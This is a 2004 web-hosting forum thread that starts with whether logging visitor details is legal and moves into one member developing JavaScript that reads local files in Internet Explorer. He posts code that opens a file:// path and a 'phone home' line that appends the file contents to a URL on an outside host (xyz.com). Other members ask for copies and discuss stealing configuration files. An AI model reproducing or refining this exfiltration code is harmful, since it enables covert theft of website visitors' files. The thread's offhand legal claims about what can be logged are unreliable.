Logging and legal issues

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Sat Mar 27, 2004 5:33 pm    Post subject: Logging and legal issues Reply with quote

Well this is going to sound stupid but someone wants to sue me because I use AWStats and I have it set up to get their resolution and what their browser is capable of doing. I don't think they have any legal reason too. Is there actually a limit to what I can legally log?
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
nquin321
-


Joined: 29 Jan 2004
Posts: 296
Location: Right Behind You

PostPosted: Sat Mar 27, 2004 5:48 pm    Post subject: Reply with quote

I don't think there is a limit to what you can log but to be legally protected
create a privacy policy.

Like this one: http://www.google.com/privacy.html
Back to top View user's profile Send private message
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Sat Mar 27, 2004 5:50 pm    Post subject: Reply with quote

I already have one. It clearly states that all that is logged. I figure even if he does bother to press charges I should have good odds of getting out of this mess without any harm.
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
iNaNimAtE
-


Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.

PostPosted: Sat Mar 27, 2004 8:34 pm    Post subject: Reply with quote

There is nothing wrong with logging user information (to a point). You can log monitor resolution, et cetera, as long as you state it in the privacy policy.

What you can't (legally) log: PID, personal information (name, address, et cetera), files stored on the computer (unless the user explicitly agrees to it), and running processes. I'm sure there are other things I forgot, but that is the basic idea.
_________________
Bienvenidos!
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Sun Mar 28, 2004 2:04 am    Post subject: Reply with quote

So it would be illegal to modify the misc_tracker.js AWStats script to return the contents of files even if it is in the privacy policy? Also, does that mean my auto IP lookup script violates privacy? It takes the incomming IP and does a Whois on it and records the results in a file.
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
iNaNimAtE
-


Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.

PostPosted: Sun Mar 28, 2004 6:21 am    Post subject: Reply with quote

No, WHOIS information is public. It is only illegal if you collect it on purpose.
_________________
Bienvenidos!
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
TRUSTAbyss
-


Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA

PostPosted: Sun Mar 28, 2004 1:07 pm    Post subject: Reply with quote

If you want to keep an eye on your log files
without sneaky little users on your site getting
in your business, use Weblog Expert Lite , its free!

http://www.weblogexpert.com
Back to top View user's profile Send private message Visit poster's website
iNaNimAtE
-


Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.

PostPosted: Sun Mar 28, 2004 7:23 pm    Post subject: Reply with quote

I've got the full version of WebLog Expert, and it is worth all the money. If you want a little more complex logs, I definitely recommend that one.
_________________
Bienvenidos!
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Mon Mar 29, 2004 3:45 am    Post subject: Reply with quote

Ok I will look into that as soon as I have some time. I was doing a little coding last night until about 5am and came across a way to get pretty much anything off someones machine and back onto my server. I bet its illegal though right even if its in my privacy policy?
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Anonymoose
-


Joined: 09 Sep 2003
Posts: 2192

PostPosted: Mon Mar 29, 2004 1:50 pm    Post subject: Reply with quote

jmoschetti45 wrote:
Ok I will look into that as soon as I have some time. I was doing a little coding last night until about 5am and came across a way to get pretty much anything off someones machine and back onto my server. I bet its illegal though right even if its in my privacy policy?


What exactly are you talking about in terms of getting "anything off someone's machine" ? If you mean browser resolution or any other information that is leaked to you deliberately by their choice of browser, there is no problem logging whatever you want. If you mean trying to take a copy of their password file from their Windows directory / get a document from the My Documents folder without their consent, you're on very dodgy ground. Both US and UK law would view this as accessing a system without explicit permission and put you in the wrong.

As a secondary thought, is your method to use an existing exploit for a particular browser, or are you talking of an problem in a general scripting language that allows access from all browsers ? If you've coded something and only tested it on IE, I'd be very suprised if it still leaks information to you in Mozilla/Opera/etc.

I'd be interested to see it in action if you need a non suing guinea pig :wink:
Back to top View user's profile Send private message
goose
-


Joined: 17 Sep 2002
Posts: 608
Location: The Land Of OZ! come here toto!

PostPosted: Mon Mar 29, 2004 4:26 pm    Post subject: Reply with quote

maybe i should sue the government for not giving me a job!!

:lol:

like they give a shit! :twisted:
_________________
living in an armish paradise.....no gates here!

mawuahahaha :)
Back to top View user's profile Send private message
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Mon Apr 05, 2004 3:05 am    Post subject: Reply with quote

What I was doing was using JavaScript to read a file. It can display the contents of text files in your browser for you. So I loaded the contents in a variable and requested a page on my server like this: missing_page.php?{$file_buffer_here}. The text from the file would then show up in the log as a 404 because the page did not exist. I have only tested this on IE 5.5 and 6. I will improve the script and posibly post a copy here if thats legal and anyone is interested. It will be a while though until its working exactly like I want it too.
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
msmollison
-


Joined: 24 Feb 2004
Posts: 15

PostPosted: Mon Apr 05, 2004 5:06 am    Post subject: Reply with quote

well you can send it to me even if it is illegal :D who's to say i am going to use it?
Back to top View user's profile Send private message Send e-mail AIM Address MSN Messenger
TRUSTAbyss
-


Joined: 29 Oct 2003
Posts: 3752
Location: USA, GA

PostPosted: Mon Apr 05, 2004 5:11 am    Post subject: Reply with quote

I wouldn't mind using it either , it could be
a usefull tool to catch crackers , oh im sorry
I guess I meant the word "hackers" :)
Back to top View user's profile Send private message Visit poster's website
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Mon Apr 05, 2004 7:46 pm    Post subject: Reply with quote

Now that people are interested I will step up development a little. I should have a semi-working beta version in a week or so.
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Mon Apr 05, 2004 8:47 pm    Post subject: Reply with quote

I just finished a very pre-alpha version. Let me know if you want the full version. Below is a sample of the script:

Code:
filehandle=window.open('file://C:/test.txt');
filecontents=filehandle.document.body.innerText;
filehandle.close();
alert(filecontents);


It will show the user the contents of the file in a pop up box.

Its been tested in IE 5.5 and 6.
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Anonymoose
-


Joined: 09 Sep 2003
Posts: 2192

PostPosted: Wed Apr 07, 2004 12:21 am    Post subject: Reply with quote

That shows the local file to the user though, and executes in the local zone. Can you confirm that it will allow you to access a users files remotely ?

Trustpunk, how on earth do you think that would help you catch hackers ?
Back to top View user's profile Send private message
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Wed Apr 07, 2004 2:46 am    Post subject: Reply with quote

Yes it executes it locally, but its so fast you don't see the window. Im still working on the 'phoneing home' feature. Something similar to this

Code:
url="http://www.xyz.com/crap.pl?" + filecontents;


Note: I just came up with that right now, the syntax might not be perfect.

Then just open a blank window and point it to 'url' and quickly close it.

Its not perfect yet, but once I get a good version done and we all put our heads together we'll come up with something good :wink:
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Anonymoose
-


Joined: 09 Sep 2003
Posts: 2192

PostPosted: Wed Apr 07, 2004 8:45 am    Post subject: Reply with quote

Hmm, that's pretty sneaky :D You do have to know the path to the users file though. Wouldn't stop you grabbing things like someone's Abyss configuration files or anything that you could have half a chance of guessing the right path for... 8O
Back to top View user's profile Send private message
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Wed Apr 07, 2004 3:48 pm    Post subject: Reply with quote

One problem with stealing Abyss config files. The extension is .conf. IE will attempt to download the file instead of displaying it. That dosen't work. This only works with files that IE will display not pop up a download box for. The fixed path is also a minor problem. Im working on the phoneing home feature right now.
_________________
http://jmoschetti45.com
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group